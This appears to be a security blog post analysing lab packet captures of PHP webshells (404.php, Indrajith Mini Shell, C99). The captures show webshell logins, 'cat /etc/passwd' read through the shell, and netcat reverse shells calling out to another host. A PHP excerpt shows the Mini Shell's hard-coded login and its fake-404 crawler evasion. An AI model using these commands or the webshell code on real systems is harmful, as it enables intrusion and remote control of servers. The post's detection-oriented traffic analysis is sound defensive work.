404 Not Found PHP webshell backdoor Traffic Analysis, Screenshots Reverse Shell Spawn and full PCAP file download

The 404.php webshell backdoor is a sneaky one: if an admin views the PHP page, it looks like a benign, missing file:

http://computersecurity.org/images/pcapanalysis/404_1.png

The trick to logging into the shell is pressing the Tab key: a small prompt appears where you type the password to access the shell:

http://computersecurity.org/images/pcapanalysis/404_2.png

And then we log in:

http://computersecurity.org/images/pcapanalysis/404_3.png

Here is what the network traffic it generates looks like:

2017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422
E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 02:34:21.438028 IP 192.168.1.100.55555 > 192.168.1.102.53294: Flags [P.], seq 1011:1834, ack 1125, win 254, length 823
E.._.>@.@..?…d…f……{..w..P….l..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:21 GMT
Server: Apache/2.4.18 (Debian)
Set-Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


2017-01-20 02:34:28.742646 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 1:614, ack 1, win 2053, length 613
E…..@…d<…f…d.0..2….&u.P…    J..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 12
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=letmein
2017-01-20 02:34:28.742666 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 614, win 238, length 0
E..(..@.@……d…f…0.&u.2.  .P….5..
2017-01-20 02:34:28.743719 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [P.], seq 1:767, ack 614, win 238, length 766
E..&..@.@……d…f…0.&u.2.  .P….3..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:28 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 377
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:34:33.005742 IP 192.168.1.102.53296 > 192.168.1.100.55555: Flags [P.], seq 614:1228, ack 767, win 2050, length 614
E…..@…d8…f…d.0..2.      ..&x.P….|..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 13
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

pass=password
2017-01-20 02:34:33.043487 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], ack 1228, win 248, length 0
E..(..@.@……d…f…0.&x.2…P….5..
2017-01-20 02:34:33.359844 IP 192.168.1.100.55555 > 192.168.1.102.53296: Flags [.], seq 767:5147, ack 1228, win 248, length 4380
E..D..@.@……d…f…0.&x.2…P….Q..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:33 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4208
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:34:43.974969 IP 192.168.1.102.53297 > 192.168.1.100.55555: Flags [P.], seq 1:688, ack 1, win 2053, length 687
E…..@…c….f…d.1..H…….P….S..POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 86
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=cat+%2Fetc%2Fpasswd&p2=&p3=&charset=Windows-1251
2017-01-20 02:34:43.974988 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [.], ack 688, win 239, length 0
E..(..@.@……d…f…1….H..mP….5..
2017-01-20 02:34:44.314752 IP 192.168.1.100.55555 > 192.168.1.102.53297: Flags [P.], seq 1:5231, ack 688, win 239, length 5230
E…..@.@..N…d…f…1….H..mP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 07:34:43 GMT
Server: Apache/2.4.18 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 02:35:30.139077 IP 192.168.1.102.53304 > 192.168.1.100.55555: Flags [P.], seq 1:712, ack 1, win 2053, length 711
E….9@…c….f…d.8……….P…….POST /404.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 109
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/404.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=ufefgoochngqdchaj6h9qm7k44

a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=nc+-nv+192.168.1.101+4444+-e+%2Fbin%2Fbash&p2=&p3=&charset=Windows-1251
2017-01-20 02:35:30.139097 IP 192.168.1.100.55555 > 192.168.1.102.53304: Flags [.], ack 712, win 240, length 0
E..(.,@.@……d…f…8……..P….5..
2017-01-20 02:35:30.611285 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [S], seq 3216154078, win 29200, options [mss 1460,sackOK,TS val 759617908 ecr 0,nop,wscale 7], length 0
E..<D.@.@.q….d…e…\……….r..H………
-F.t……..
2017-01-20 02:35:30.611975 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [S.], seq 451231491, ack 3216154079, win 14480, options [mss 1460,sackOK,TS val 287395312 ecr 759617908,nop,wscale 6], length 0
E..<..@.@……e…d.\….?…….8..#………
.!M.-F.t….
2017-01-20 02:35:30.611988 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 759617909 ecr 287395312], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F.u.!M.

2017-01-20 02:35:36.943763 IP 192.168.1.101.4444 > 192.168.1.100.56704: Flags [P.], seq 1:4, ack 1, win 227, options [nop,nop,TS val 287395945 ecr 759617909], length 3
E..7r.@.@.C….e…d.\….?………o……
.!Pi-F.uid

2017-01-20 02:35:36.943789 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [.], ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4D.@.@.q….d…e…\……?……@…..
-F…!Pi
2017-01-20 02:35:36.944117 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 353:393, ack 160, win 408, options [nop,nop,TS val 287395945 ecr 759619491], length 40
E..\.@@.@.42…e…d…..x>^’bb……n…..
.!Pi-F…<T……z.?P%#{…j.A..9..b.<…….r..
2017-01-20 02:35:36.944130 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 393, win 951, options [nop,nop,TS val 759619492 ecr 287395945], length 0
E..4u.@.@.@….d…e….’bb..x>……@…..
-F…!Pi
2017-01-20 02:35:36.945239 IP 192.168.1.100.56704 > 192.168.1.101.4444: Flags [P.], seq 1:55, ack 4, win 229, options [nop,nop,TS val 759619492 ecr 287395945], length 54
E..jD.@.@.q….d…e…\……?……v…..
-F…!Piuid=33(www-data) gid=33(www-data) groups=33(www-data)

Indrajith Mini Shell v.2.0 Traffic Analysis Python Reverse Shell Pivot Netcat Shell PCAP file download webshell backdoor

<?php
/*
 * Indrajith Mini Shell v.2.0 with additional features....
 * originally scripted by AJITH KP
 * (c) Under Gnu General Public Licence 3(c)
 * Team Open Fire and Indishell Family
 * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
 * Indishell : ASHELL, D@rkwolf.
 * THA : THA RUDE [There is Nothing in Borders]
 * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends.
 */

/*------------------ LOGIN -------------------*/

// Hard-coded credentials; the captured login above uses this password
$username = "admin";
$password = "password";
$email = "blah@gmail.com";

/*------------------ Login Data End ----------*/

@error_reporting(4);

/*------------------ Anti Crawler ------------*/
if (!empty($_SERVER['HTTP_USER_AGENT']))
{
    // Search-engine crawlers get a fake 404 so the shell is never indexed;
    // a browser User-Agent (as in the capture) gets the real page
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
    {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
/*------------------ End of Anti Crawler -----*/

http://computersecurity.org/images/pcapanalysis/minishell2.png

http://computersecurity.org/images/pcapanalysis/minishell.png

2017-01-20 04:53:39.022938 IP 192.168.1.102.56105 > 192.168.1.100.55555: Flags [P.], seq 703:1131, ack 1011, win 2049, length 428
E…..@…F6…f…d.)……4,!.P….$..GET /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 04:53:39.023459 IP 192.168.1.100.55555 > 192.168.1.102.56105: Flags [P.], seq 1011:3471, ack 1131, win 254, length 2460
E.      .j.@.@.C….d…f…)4,!…..P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:39 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2208
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:53:47.492620 IP 192.168.1.102.56109 > 192.168.1.100.55555: Flags [P.], seq 1:617, ack 1, win 2053, length 616
E…..@…Eh…f…d.-..i.].V.kUP… …POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 49
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8

action=login&hide=&usrname=ry4wn&passwrd=password
2017-01-20 04:53:47.492641 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [.], ack 617, win 238, length 0
E..(..@.@……d…f…-V.kUi.`XP….5..
2017-01-20 04:53:47.641385 IP 192.168.1.100.55555 > 192.168.1.102.56109: Flags [P.], seq 1:4840, ack 617, win 238, length 4839
E…..@.@……d…f…-V.kUi.`XP…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:53:47 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:54:16.709688 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [P.], seq 1:665, ack 1, win 2053, length 664
E…..@…E1…f…d.2…,….3^P……POST /minishell.php HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Content-Length: 23520
Cache-Control: max-age=0
Origin: http://192.168.1.100:55555
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl1cCBVNLAAiFAzMh
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:16.709713 IP 192.168.1.100.55555 > 192.168.1.102.56114: Flags [.], ack 665, win 239, length 0
E..(.7@.@..~…d…f…2..3^.,..P….5..
2017-01-20 04:54:16.744669 IP 192.168.1.102.56114 > 192.168.1.100.55555: Flags [.], seq 665:6505, ack 1, win 2053, length 5840
E…..@…0….f…d.2…,….3^P…….------WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name="path"

/var/www/html
------WebKitFormBoundaryl1cCBVNLAAiFAzMh
Content-Disposition: form-data; name="upload_f"; filename="cerber4.PNG"
Content-Type: image/png

.PNG

2017-01-20 04:54:29.004913 IP 192.168.1.102.56118 > 192.168.1.100.55555: Flags [P.], seq 1:527, ack 1, win 2053, length 526
E..6/.@…E….f…d.6..V*mr>-.*P…xu..GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:54:29.004929 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [.], ack 527, win 237, length 0
E..(.A@.@..s…d…f…6>-.*V*o.P….5..
2017-01-20 04:54:29.006011 IP 192.168.1.100.55555 > 192.168.1.102.56118: Flags [P.], seq 1:4781, ack 527, win 237, length 4780
E….B@.@……d…f…6>-.*V*o.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:54:29 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4527
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:55:04.451424 IP 192.168.1.102.56136 > 192.168.1.100.55555: Flags [P.], seq 1:554, ack 1, win 2053, length 553
E..Q/L@…E@…f…d.H..d…..N.P…Y…GET /minishell.php?path=%2Fvar%2Fwww%2Fhtml&cmdexe=cat+%2Fetc%2Fpasswd HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:55:04.451446 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [.], ack 554, win 237, length 0
E..(..@.@.1….d…f…H..N.d…P….5..
2017-01-20 04:55:04.454232 IP 192.168.1.100.55555 > 192.168.1.102.56136: Flags [P.], seq 1:4888, ack 554, win 237, length 4887
E..?..@.@……d…f…H..N.d…P….L..HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 09:55:04 GMT
Server: Apache/2.4.18 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4634
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 04:56:27.249472 IP 192.168.1.102.56179 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.s…pk..7..P…&…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.102&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:27.249487 IP 192.168.1.100.55555 > 192.168.1.102.56179: Flags [.], ack 566, win 237, length 0
E..(..@.@……d…f…s.7…pm;P….5..
2017-01-20 04:56:27.249992 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732068 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:27.279498 IP 192.168.1.100.55555 > 192.168.1.102.56177: Flags [.], ack 567, win 237, length 0
E..(.&@.@……d…f…q…5…gP….5..
2017-01-20 04:56:27.753875 IP 192.168.1.102.56174 > 192.168.1.105.62663: Flags [R.], seq 2302, ack 1364, win 0, length 0
E..(.m@…qC…f…i.n..7.UM%l..P………….
2017-01-20 04:56:27.906170 IP 192.168.1.102.56086 > 172.217.5.238.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)j.@….^…f…………..j.P….U……..
2017-01-20 04:56:28.150144 IP 192.168.1.102.56087 > 172.217.7.161.443: Flags [.], seq 0:1, ack 1, win 255, length 1
E..)p.@….O…f……….K..”..P…~………
2017-01-20 04:56:28.247493 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732318 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….
2017-01-20 04:56:28.295154 IP 192.168.1.102.55993 > 74.125.192.188.5228: Flags [.], seq 0:1, ack 1, win 258, length 1
E..)..@….Y…fJ}…..l….wm7KP….r……..
2017-01-20 04:56:28.435666 IP 192.168.1.102.56088 > 172.217.3.46.443: Flags [.], seq 0:1, ack 1, win 256, length 1
E..)..@……..f……..4.p….tP…=………
2017-01-20 04:56:30.251494 IP 192.168.1.100.39338 > 192.168.1.102.4444: Flags [S], seq 1272629225, win 29200, options [mss 1460,sackOK,TS val 761732819 ecr 0,nop,wscale 7], length 0
E..<..@.@……d…f…\K………r..I………
-g……….

2017-01-20 04:56:35.021686 IP 192.168.1.102.56180 > 192.168.1.100.55555: Flags [P.], seq 1:566, ack 1, win 2053, length 565
E..]/.@…D….f…d.t….p.f.TYP…_…GET /minishell.php?rev_option=PHP+Reverse+Shell&my_ip=192.168.1.101&my_port=4444 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.1.100:55555/minishell.php?rs
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: user=ry4wn; pass=5f4dcc3b5aa765d61d8327deb882cf99

2017-01-20 04:56:35.021703 IP 192.168.1.100.55555 > 192.168.1.102.56180: Flags [.], ack 566, win 237, length 0
E..(w”@.@.?….d…f…tf.TY..rIP….5..
2017-01-20 04:56:35.022202 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [S], seq 3778293001, win 29200, options [mss 1460,sackOK,TS val 761734011 ecr 0,nop,wscale 7], length 0
E..<.r@.@..0…d…e.z.\.4-     ……r..H………
-g#{……..
2017-01-20 04:56:35.022902 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [S.], seq 1108359154, ack 3778293002, win 14480, options [mss 1460,sackOK,TS val 288241756 ecr 761734011,nop,wscale 6], length 0
E..<..@.@……e…d.\.zB.7..4-
..8.t……….
..8\-g#{….
2017-01-20 04:56:35.022912 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 1, win 229, options [nop,nop,TS val 761734011 ecr 288241756], length 0
E..4.s@.@..7…d…e.z.\.4-
B.7……@…..
-g#{..8\
2017-01-20 04:56:35.024064 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 1:17, ack 1, win 227, options [nop,nop,TS val 288241756 ecr 761734011], length 16
E..D..@.@……e…d.\.zB.7..4-
…..r…..
..8\-g#{cat /etc/passwd

2017-01-20 04:56:35.024076 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [.], ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 0
E..4.t@.@..6…d…e.z.\.4-
B.8……@…..
-g#|..8\
2017-01-20 04:56:35.024600 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 1:94, ack 17, win 229, options [nop,nop,TS val 761734012 ecr 288241756], length 93
E….u@.@……d…e.z.\.4-
B.8…………
-g#|..8\Linux wittyserver 4.3.0-kali1-amd64 #1 SMP Debian 4.3.3-5kali4 (2016-01-13) x86_64 GNU/Linux

2017-01-20 04:57:39.776713 IP 192.168.1.101.4444 > 192.168.1.100.57978: Flags [P.], seq 34:73, ack 4295, win 453, options [nop,nop,TS val 288248231 ecr 761737394], length 39
E..[..@.@……e…d.\.zB.8..4=…………
..Q.-g0.nc -nv 192.168.1.100 5555 -e /bin/bash

2017-01-20 04:57:39.777076 IP 192.168.1.101.22 > 192.168.1.100.53010: Flags [P.], seq 8009:8049, ack 2960, win 408, options [nop,nop,TS val 288248231 ecr 761750200], length 40
E..\..@.@.3….e…d…..xy.’bt4….t……
..Q.-gb…P@*.u..L%S.d..\r..d.@yo..>;.X..9.#n&h.
2017-01-20 04:57:39.777085 IP 192.168.1.100.53010 > 192.168.1.101.22: Flags [.], ack 8049, win 1233, options [nop,nop,TS val 761750200 ecr 288248231], length 0
E..4v.@.@.?….d…e….’bt4.xyF…..@…..
-gb…Q.
2017-01-20 04:57:39.777528 IP 192.168.1.100.57978 > 192.168.1.101.4444: Flags [P.], seq 4295:4335, ack 73, win 229, options [nop,nop,TS val 761750200 ecr 288248231], length 40
E..\..@.@……d…e.z.\.4=.B.8;…..h…..
-gb…Q.(UNKNOWN) [192.168.1.100] 5555 (?) open

C99 Webshell Backdoor SpYshell v.KingDefacer Traffic Analysis PCAP file download screenshots

Usage of the C99 webshell, with the PCAP and screenshots of what it looks like; this has been one of the most commonly used webshells over the years.

2017-01-20 03:22:24.448614 IP 192.168.1.102.54057 > 192.168.1.100.55555: Flags [P.], seq 1:404, ack 1, win 2053, length 403
E…..@…Z|…f…d.)…..#.A..P…;…GET /c99.php?c99shcook[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:24.448633 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [.], ack 404, win 237, length 0
E..(/.@.@……d…f…).A….  .P….5..
2017-01-20 03:22:24.449057 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [P.], seq 1:327, ack 404, win 237, length 326
E..n/.@.@……d…f…).A….  .P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:24 GMT
Server: Apache/2.4.18 (Debian)
WWW-Belgele: Basic realm="SpYshell KingDefacer: Restricted area"SpYshell v.KingDefacer
Content-Length: 87
Connection: close
Content-Type: text/html; charset=UTF-8

<a href="http://xxxxxxxxxxxxxxxxxxxxxxxx">SpYshell v.KingDefacer</a>: Erisim Engellendi

2017-01-20 03:22:31.946998 IP 192.168.1.102.54059 > 192.168.1.100.55555: Flags [P.], seq 1:400, ack 1, win 2053, length 399
E…..@…Zr…f…d.+….:[.~..P…g=..GET /c99.php?ry4wn[login]=0 HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.947013 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [.], ack 400, win 237, length 0
E..(.@@.@..u…d…f…+.~….;.P….5..
2017-01-20 03:22:31.952320 IP 192.168.1.100.55555 > 192.168.1.102.54059: Flags [P.], seq 1:5601, ack 400, win 237, length 5600
E….A@.@……d…f…+.~….;.P…….HTTP/1.1 200 OK
Date: Fri, 20 Jan 2017 08:22:31 GMT
Server: Apache/2.4.18 (Debian)
Zamani: Mon, 12 May 2005 03:00:00 GMT
Son Modifiye: Fri, 20 Jan 2017 08:22:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pratik: no-cache
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 5151
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2017-01-20 03:22:31.983921 IP 192.168.1.102.54062 > 192.168.1.100.55555: Flags [P.], seq 1:384, ack 1, win 2053, length 383
E…..@…Zq…f…d…..s/p…@P….[..GET /c99.php?act=img&img=up HTTP/1.1
Host: 192.168.1.100:55555
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: image/webp,image/*,*/*;q=0.8
Referer: http://192.168.1.100:55555/c99.php?ry4wn[login]=0
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8

2017-01-20 03:22:31.983929 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [.], ack 384, win 237, length 0
E..(&.@.@……d…f…….@.s0.P….5..
2017-01-20 03:22:31.984218 IP 192.168.1.100.55555 > 192.168.1.102.54062: Flags [P.], seq 1:327, ack 384, win 237, length 326
E..n&.@.@..z…d…f…….@.s0.P….{..HTTP/1.0 401 Yetkisiz
Date: Fri, 20 Jan 2017 08:22:31 GMT
